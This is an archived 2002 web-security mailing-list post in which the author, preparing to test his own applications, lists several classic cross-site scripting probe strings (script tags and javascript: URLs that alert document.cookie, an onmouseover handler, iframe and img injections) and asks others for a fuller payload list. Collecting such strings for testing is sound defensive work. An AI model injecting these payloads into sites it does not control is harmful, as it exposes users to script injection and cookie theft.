WebApp Sec: XSS Strings

XSS Strings

From: <securityarchitect_at_hush.com>
Date: Sun, 15 Dec 2002 23:54:52 -0800

Maybe more for vuln-dev, but I have bitten the bullet and pulled out wget and perl and am gonna start testing my apps for XSS, and I need to build the ultimate list of payloads.

For the HTML tags period I guess it's the classic:

<script>alert(document.cookie)</script>
<a href="X" onmouseover="alert(document.cookie">
<javascript ="http://www.host/script.js"
"javascript:alert(document.cookie)"
<iframe = c:\>
<img src = "evil.js">

But I seem to recall some old versions of Netscape run the { etc

Does anyone have a good list of payloads that will cover the majority of the options?

Received on Dec 16 2002
